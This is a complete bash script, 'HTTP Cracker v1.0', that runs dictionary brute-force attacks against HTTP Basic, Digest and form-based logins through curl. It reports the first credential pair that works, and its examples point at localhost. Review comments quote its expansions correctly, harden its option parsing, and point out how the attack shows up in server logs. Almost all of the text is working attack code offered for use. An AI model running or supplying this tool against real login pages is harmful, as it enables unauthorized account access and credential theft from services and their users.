#!/bin/bash
# Print the usage banner, the option summary and four example invocations
# to stdout, then terminate the script with exit status 1.
# Note: this function shadows the bash builtin of the same name.
help () {
  local -a usage_lines=(
    ' ---------------- HTTP Cracker v1.0 (20151206) ---------------------- '
    ' -u [URL] set the url for crack '
    ' -d [filename] a dic file contain many user:pass line'
    ' -m [mode] set the crack mode {0:basic 1:digest 2:form}, default is 0 '
    ' -s [strings] set error string for the form mode '
    ' -g manual get error string for the form mode '
    ''
    ' example: '
    ' 1. http_cracker.sh -u "http://127.0.0.1:80/auth_basic/" -d 1.txt -m 0 '
    ' 2. http_cracker.sh -u "http://127.0.0.1:80/auth_digest/" -d 1.txt -m 1 '
    ' 3. http_cracker.sh -u "http://127.0.0.1/web_vul/login.php@username={USER}&password={PASS}" -d 1.txt -m 2 -g '
    ' 4. http_cracker.sh -u "http://127.0.0.1/web_vul/login.php@username={USER}&password={PASS}" -d 1.txt -m 2 -s "Yahei" '
    ' -------------------------------------------------------------------- '
  )
  # One array element per output line; the empty element is the blank line.
  printf '%s\n' "${usage_lines[@]}"
  exit 1
}
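# ---------------------------------------------------------------------------
# Option parsing and main loop.
#
# Review fixes in this block (interface and messages unchanged):
#   * every expansion is quoted, so a URL, dictionary entry or error string
#     containing spaces, glob characters or a leading '-' can no longer be
#     word-split, expanded against the working directory, or read as an
#     option by test/grep/curl;
#   * the dictionary is read line by line with `read -r` instead of
#     `for ... in $(cat file)`, which split on any whitespace and
#     glob-expanded entries;
#   * the password is everything after the FIRST delimiter, so it is no
#     longer cut at a second ':'; likewise the form body is everything
#     after the first '@' of -u;
#   * -m is validated and unknown flags / missing arguments show the usage
#     instead of being silently ignored;
#   * results are printed with printf '%s', so backslashes in credentials
#     are not interpreted the way `echo -e` did.
# ---------------------------------------------------------------------------

# The leading ':' in the optstring selects getopts' silent mode: an unknown
# flag or a missing argument arrives as '?' or ':' and falls into '*)'.
while getopts ":u:d:m:s:g" Option; do
  case "$Option" in
    u) opt_url=$OPTARG ;;
    d) opt_dic=$OPTARG ;;
    m) opt_mode=$OPTARG ;;
    s) opt_string=$OPTARG ;;
    g) opt_get=1 ;;
    *) help ;;
  esac
done
shift "$((OPTIND - 1))"

# -u and -d are mandatory; -m defaults to 0 (basic) and -g to off.
[[ -n ${opt_url:-} ]] || help
[[ -n ${opt_dic:-} ]] || help
opt_mode=${opt_mode:-0}
opt_get=${opt_get:-0}
opt_string=${opt_string:-}

# Only the three documented modes are accepted.
case "$opt_mode" in
  0 | 1 | 2) ;;
  *) help ;;
esac

# Form mode needs either -g (dump one response) or -s (the failure marker).
if [[ $opt_mode == 2 && $opt_get == 0 && -z $opt_string ]]; then
  help
fi

if [[ ! -r $opt_dic || -d $opt_dic ]]; then
  printf 'err: cannot read dictionary file [%s]\n' "$opt_dic" >&2
  exit 1
fi

var_sock_timeout=3
var_pairs_delim=':'

# Options shared by every request. An empty --user-agent makes curl omit the
# User-Agent header entirely, so server-side each run appears as a sequence
# of sequential requests from one client without that header -- together
# with the burst of failed logins this is the trace that lockout,
# rate-limiting and log-based detection rely on.
# NOTE(review): candidate credentials are passed on curl's command line and
# are therefore visible in the local process list while a request runs.
curl_common=(--user-agent "" -m "$var_sock_timeout" -s)

echo 'Running...'
# `read` with the default IFS trims leading/trailing whitespace; the trailing
# `|| [[ -n ... ]]` keeps a last line that has no terminating newline.
while read -r var_pairs || [[ -n $var_pairs ]]; do
  [[ -n $var_pairs ]] || continue

  # A line without the delimiter yields user == pass == the whole line,
  # which matches what `cut` did in the original.
  user=${var_pairs%%"$var_pairs_delim"*}
  pass=${var_pairs#*"$var_pairs_delim"}

  case "$opt_mode" in
    0)
      ret=$(curl "${curl_common[@]}" -I --basic -u "$user:$pass" "$opt_url")
      if [[ -z $ret ]]; then
        printf 'err: connect timeout! [%s]\n' "$opt_url"
        break
      fi
      # Third field of the status line, i.e. the first word of the reason
      # phrase.
      # NOTE(review): success is inferred only from the absence of
      # "Unauthorized" here, so any other reply (redirect, 404, 5xx, or a
      # status line without a reason phrase) is also reported as found.
      ret=$(awk 'NR==1 {print $3}' <<<"$ret")
      if [[ $ret != *Unauthorized* ]]; then
        printf '\n[%s:%s] is Found!!! [%s]\n' "$user" "$pass" "$opt_url"
        break
      fi
      ;;
    1)
      ret=$(curl "${curl_common[@]}" -I --digest -u "$user:$pass" "$opt_url")
      if [[ -z $ret ]]; then
        printf 'err: connect timeout! [%s]\n' "$opt_url"
        break
      fi
      # Success requires this exact status line somewhere in the headers.
      if [[ $ret == *'HTTP/1.1 200 OK'* ]]; then
        printf '\n[%s:%s] is Found!!! [%s]\n' "$user" "$pass" "$opt_url"
        break
      fi
      ;;
    2)
      # -u has the shape "<url>@<form body>"; the body carries the {USER}
      # and {PASS} placeholders (first occurrence of each is replaced).
      var_http_form_url=${opt_url%%@*}
      var_http_form_dat=${opt_url#*@}
      # The replacement is quoted so that '&' in a credential stays literal
      # (newer bash versions treat an unquoted '&' as "the matched text").
      var_http_form_dat=${var_http_form_dat/\{USER\}/"$user"}
      var_http_form_dat=${var_http_form_dat/\{PASS\}/"$pass"}
      # NOTE(review): --data sends the body as-is (no URL-encoding) and
      # treats a body starting with '@' as "read from this file".
      ret=$(curl "${curl_common[@]}" --data "$var_http_form_dat" "$var_http_form_url")
      if [[ -z $ret ]]; then
        printf 'err: connect timeout! [%s]\n' "$opt_url"
        break
      fi
      if [[ $opt_get == 1 ]]; then
        # -g: show the response to the first entry so the operator can pick
        # the failure marker for -s, then stop.
        printf '%s\n' "$ret"
        break
      fi
      # The -s value is still a grep pattern; '--' keeps a leading '-' in it
      # from being parsed as a grep option.
      if ! grep -q -- "$opt_string" <<<"$ret"; then
        printf '\n[%s:%s] is Found!!! [%s]\n' "$user" "$pass" "$opt_url"
        break
      fi
      ;;
  esac

  # One progress mark per entry that did not end the loop.
  printf '*'
done < "$opt_dic"

echo
echo 'Game Over'
echo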